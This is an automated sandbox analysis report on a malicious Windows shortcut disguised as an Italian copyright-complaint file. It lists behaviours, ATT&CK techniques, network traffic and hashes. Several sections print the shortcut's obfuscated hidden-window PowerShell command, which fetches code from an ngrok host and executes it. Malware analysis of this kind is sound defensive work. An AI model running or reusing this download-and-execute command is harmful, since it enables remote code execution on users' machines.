Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4993Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2785Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3480Thread sleep count: 4993 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3480Thread sleep count: 2785 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3456Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
1
Modify Registry
OS Credential Dumping11
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory21
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Install Root Certificate
NTDS1
Remote System Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets11
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk39%VirustotalBrowse
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk18%ReversingLabsShortcut.Trojan.Pantera
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
5awvoe1sr8b6b5g9cfxz.ngrok.app
3.6.115.182
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50betrue
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    3.6.115.182
    5awvoe1sr8b6b5g9cfxz.ngrok.appUnited States
    16509AMAZON-02UStrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1578153
    Start date and time:2024-12-19 10:35:35 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 1m 58s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
    Detection:MAL
    Classification:mal80.winLNK@3/3@1/1
    Cookbook Comments:
    • Found application associated with file extension: .lnk
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
    • Not all processes where analyzed, report is missing behavior information
    TimeTypeDescription
    04:36:29API Interceptor27x Sleep call for process: powershell.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    3.6.115.182kuEfaZxkiY.exeGet hashmaliciousRedLineBrowse
    • 0.tcp.in.ngrok.io:17383/
    RN2vknsx6G.exeGet hashmaliciousRedLineBrowse
    • 0.tcp.in.ngrok.io:17440/
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    5awvoe1sr8b6b5g9cfxz.ngrok.appRapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
    • 3.125.102.39
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AMAZON-02USpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 184.77.160.143
    DeltaX.exeGet hashmaliciousUnknownBrowse
    • 54.230.112.122
    CROC000400 .pdfGet hashmaliciousUnknownBrowse
    • 108.158.75.106
    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 35.167.216.68
    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 35.156.171.87
    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 3.163.158.110
    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 3.248.220.130
    https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
    • 13.227.8.47
    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 13.232.112.86
    pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
    • 108.139.47.108
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    05af1f5ca1b87cc9cc9b25185115607dPago.xlsGet hashmaliciousAveMaria, UACMeBrowse
    • 3.6.115.182
    NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
    • 3.6.115.182
    rcNDmdah2W.docGet hashmaliciousUnknownBrowse
    • 3.6.115.182
    SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
    • 3.6.115.182
    CMR ART009.docxGet hashmaliciousUnknownBrowse
    • 3.6.115.182
    Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
    • 3.6.115.182
    Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
    • 3.6.115.182
    510005940.docx.docGet hashmaliciousUnknownBrowse
    • 3.6.115.182
    invoice09850.xlsGet hashmaliciousRemcosBrowse
    • 3.6.115.182
    Invoice A037.xlsGet hashmaliciousUnknownBrowse
    • 3.6.115.182
    No context
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):64
    Entropy (8bit):0.34726597513537405
    Encrypted:false
    SSDEEP:3:Nlll:Nll
    MD5:446DD1CF97EABA21CF14D03AEBC79F27
    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
    Malicious:false
    Reputation:high, very likely benign file
    Preview:@...e...........................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Reputation:high, very likely benign file
    Preview:1
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Reputation:high, very likely benign file
    Preview:1
    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
    Entropy (8bit):3.7223232228578276
    TrID:
    • Windows Shortcut (20020/1) 100.00%
    File name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
    File size:2'590 bytes
    MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
    SHA1:1376441bc8171553125dac0415240a81859ee8f7
    SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
    SHA512:e9a8df752694ca6d184c480beb27d12a2f48f1b7d084b7372ec8387046db47fb7e84fd048fb1fe3a32ad63e0454345febc6d3a32b176d20d281c0388b60835e7
    SSDEEP:48:8GIgax4PsU/rJETWap8irXBblgGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2rWTWauiFhgdl2uWvZg5Y
    TLSH:5D51BF252BD91734F3B74E754976A2519A7AB946BC224F1D408042480C62B19EC75F2B
    File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......
    Icon Hash:aae3e3e38383b909

    General

    Relative Path:..\..\..\..\Windows\System32\cmd.exe
    Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
    Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    TimestampSource PortDest PortSource IPDest IP
    Dec 19, 2024 10:36:33.822408915 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:33.822459936 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:33.822588921 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:33.830399036 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:33.830415964 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:35.443197012 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:35.443337917 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:35.558769941 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:35.558804035 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:35.559777975 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:35.767338991 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:35.767508984 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:36.012165070 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:36.059330940 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:36.522744894 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:36.522850037 CET443491633.6.115.182192.168.2.22
    Dec 19, 2024 10:36:36.522933006 CET49163443192.168.2.223.6.115.182
    Dec 19, 2024 10:36:36.533508062 CET49163443192.168.2.223.6.115.182
    TimestampSource PortDest PortSource IPDest IP
    Dec 19, 2024 10:36:33.542362928 CET5456253192.168.2.228.8.8.8
    Dec 19, 2024 10:36:33.811022997 CET53545628.8.8.8192.168.2.22
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Dec 19, 2024 10:36:33.542362928 CET192.168.2.228.8.8.80x448bStandard query (0)5awvoe1sr8b6b5g9cfxz.ngrok.appA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Dec 19, 2024 10:36:33.811022997 CET8.8.8.8192.168.2.220x448bNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.115.182A (IP address)IN (0x0001)false
    Dec 19, 2024 10:36:33.811022997 CET8.8.8.8192.168.2.220x448bNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.30.85A (IP address)IN (0x0001)false
    Dec 19, 2024 10:36:33.811022997 CET8.8.8.8192.168.2.220x448bNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.115.64A (IP address)IN (0x0001)false
    Dec 19, 2024 10:36:33.811022997 CET8.8.8.8192.168.2.220x448bNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.98.232A (IP address)IN (0x0001)false
    Dec 19, 2024 10:36:33.811022997 CET8.8.8.8192.168.2.220x448bNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.122.107A (IP address)IN (0x0001)false
    • 5awvoe1sr8b6b5g9cfxz.ngrok.app
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.22491633.6.115.1824433444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    TimestampBytes transferredDirectionData
    2024-12-19 09:36:36 UTC217OUTGET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
    Host: 5awvoe1sr8b6b5g9cfxz.ngrok.app
    Connection: Keep-Alive
    2024-12-19 09:36:36 UTC162INHTTP/1.1 404 Not Found
    Connection: close
    Content-Type: text/plain
    Ngrok-Error-Code: ERR_NGROK_3200
    Date: Thu, 19 Dec 2024 09:36:36 GMT
    Content-Length: 67
    2024-12-19 09:36:36 UTC67INData Raw: 54 75 6e 6e 65 6c 20 35 61 77 76 6f 65 31 73 72 38 62 36 62 35 67 39 63 66 78 7a 2e 6e 67 72 6f 6b 2e 61 70 70 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a 0d 0a 45 52 52 5f 4e 47 52 4f 4b 5f 33 32 30 30 0d 0a
    Data Ascii: Tunnel 5awvoe1sr8b6b5g9cfxz.ngrok.app not foundERR_NGROK_3200


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:04:36:28
    Start date:19/12/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
    Imagebase:0x4aa20000
    File size:345'088 bytes
    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:3
    Start time:04:36:29
    Start date:19/12/2024
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
    Imagebase:0x13f710000
    File size:443'392 bytes
    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    No disassembly